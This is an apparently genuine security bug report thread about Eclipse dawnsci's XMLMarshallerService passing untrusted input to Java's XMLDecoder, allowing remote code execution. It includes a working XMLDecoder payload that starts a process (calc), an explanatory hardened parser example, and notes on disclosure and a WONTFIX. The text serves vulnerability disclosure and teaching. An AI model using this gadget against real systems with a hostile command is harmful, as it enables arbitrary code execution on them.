From the Security Team inbox:

--
https://github.com/eclipse/dawnsci/blob/master/org.eclipse.dawnsci.remotedataset.core/src/org/eclipse/dawnsci/remotedataset/XMLMarshallerService.java uses the insecure XMLDecoder to unmarshal XML files, leading to remote code execution (RCE). For example, the sample code below should pop up a calculator.

    //https://github.com/pwntester/XMLDecoder/blob/master/bean-rce.xml
    String xml = " <object class=\"java.lang.ProcessBuilder\">\r\n" +
                 "   <array class=\"java.lang.String\" length=\"1\">\r\n" +
                 "     <void index=\"0\">\r\n" +
                 "       <string>calc</string>\r\n" +
                 "     </void>\r\n" +
                 "   </array>\r\n" +
                 "   <void method=\"start\" />\r\n" +
                 " </object>\r\n";
    XMLMarshallerService x = new XMLMarshallerService();
    byte[] b = xml.getBytes();
    Map<String, Object> m = (Map<String, Object>) x.unmarshal(xml, Map.class);

It looks like the unmarshal code is called at https://github.com/eclipse/dawnsci/blob/master/org.eclipse.dawnsci.remotedataset.client/src/org/eclipse/dawnsci/remotedataset/client/RemoteDataHolder.java, and potentially downloading the XML file from a remote service increases the risk.
--
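The root cause in the report is that java.beans.XMLDecoder does not deserialize data; it executes the document as a sequence of constructor and method calls, so any class on the classpath can be instantiated from untrusted input. The example below is added here and is not dawnsci code or the reporter's code. It places the unsafe XMLDecoder pattern beside a hardened replacement that parses the input as plain XML (DTDs and external entities disabled) and copies only a fixed, hypothetical <map>/<entry> schema into a Map; a document whose root is <object>, as in the report, is rejected before anything can run. The class name SafeMapUnmarshal, the <map>/<entry> schema and the sample strings are all constructed for this example.

```java
import java.beans.XMLDecoder;
import java.io.ByteArrayInputStream;
import java.nio.charset.StandardCharsets;
import java.util.HashMap;
import java.util.Map;
import javax.xml.XMLConstants;
import javax.xml.parsers.DocumentBuilder;
import javax.xml.parsers.DocumentBuilderFactory;
import org.w3c.dom.Document;
import org.w3c.dom.Element;
import org.w3c.dom.Node;
import org.w3c.dom.NodeList;

// Added example, not project code. Only XMLDecoder and the JDK XML APIs are real;
// the class name, the <map>/<entry> schema and the sample documents are hypothetical.
public class SafeMapUnmarshal {

    // Constructed sample: a benign document in the hypothetical schema.
    static final String BENIGN =
        "<map><entry key=\"name\">pressure</entry><entry key=\"value\">42</entry></map>";

    // Constructed sample: the root-element shape of the payload in the report.
    // No command is included; the point is that the element names are an instruction set.
    static final String HOSTILE_SHAPE =
        "<object class=\"java.lang.ProcessBuilder\"/>";

    // UNSAFE: XMLDecoder treats the document as bean-construction instructions.
    // <object class="..."> instantiates that class and <void method="..."> calls
    // a method on it, regardless of what the caller expected to get back.
    static Object unsafeUnmarshal(byte[] xml) {
        try (XMLDecoder d = new XMLDecoder(new ByteArrayInputStream(xml))) {
            return d.readObject();
        }
    }

    // SAFE: parse as plain XML with DOCTYPE and external entities disabled, then
    // map only the elements of the expected schema. Anything else is rejected;
    // no class named in the input is ever instantiated.
    static Map<String, String> safeUnmarshal(byte[] xml) throws Exception {
        DocumentBuilderFactory f = DocumentBuilderFactory.newInstance();
        f.setFeature(XMLConstants.FEATURE_SECURE_PROCESSING, true);
        f.setFeature("http://apache.org/xml/features/disallow-doctype-decl", true);
        f.setFeature("http://xml.org/sax/features/external-general-entities", false);
        f.setFeature("http://xml.org/sax/features/external-parameter-entities", false);
        f.setXIncludeAware(false);
        f.setExpandEntityReferences(false);
        DocumentBuilder b = f.newDocumentBuilder();
        Document doc = b.parse(new ByteArrayInputStream(xml));

        Element root = doc.getDocumentElement();
        if (!"map".equals(root.getTagName())) {
            throw new IllegalArgumentException("unexpected root element: " + root.getTagName());
        }
        Map<String, String> out = new HashMap<>();
        NodeList children = root.getChildNodes();
        for (int i = 0; i < children.getLength(); i++) {
            Node n = children.item(i);
            if (n.getNodeType() != Node.ELEMENT_NODE) {
                continue; // ignore whitespace and comments between entries
            }
            Element e = (Element) n;
            if (!"entry".equals(e.getTagName()) || !e.hasAttribute("key")) {
                throw new IllegalArgumentException("unexpected element: " + e.getTagName());
            }
            out.put(e.getAttribute("key"), e.getTextContent());
        }
        return out;
    }

    public static void main(String[] args) throws Exception {
        // Benign input maps cleanly.
        System.out.println(safeUnmarshal(BENIGN.getBytes(StandardCharsets.UTF_8)));
        // The report's document shape is refused at the root element, before any
        // class name in it is looked at.
        try {
            safeUnmarshal(HOSTILE_SHAPE.getBytes(StandardCharsets.UTF_8));
        } catch (IllegalArgumentException ex) {
            System.out.println("rejected: " + ex.getMessage());
        }
        // unsafeUnmarshal is intentionally not invoked on HOSTILE_SHAPE here: with
        // XMLDecoder the <object class=...> element is an instantiation request,
        // not data, which is exactly the behaviour the report describes.
    }
}
```

The decisive design choice is the type of the parser, not input filtering: an allowlist of class names in front of XMLDecoder is fragile because the format also supports <class>, idref and nested method calls, whereas a DOM or JAXB mapping onto a fixed schema cannot instantiate a class the code does not already name. The DocumentBuilderFactory features shown are the usual XXE hardening for the JDK's built-in parser and are independent of the XMLDecoder issue.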
Project team: there is some help in the handbook regarding how we handle vulnerabilities. https://www.eclipse.org/projects/handbook/#vulnerability
Matthew, can you or somebody from the project team respond please?
Housekeeping. We're well past the three month disclosure deadline, so I'm removing the confidential flag.
Based on [1], the project is dead. WONTFIX. [1] https://www.eclipse.org/lists/dawnsci-dev/msg00005.html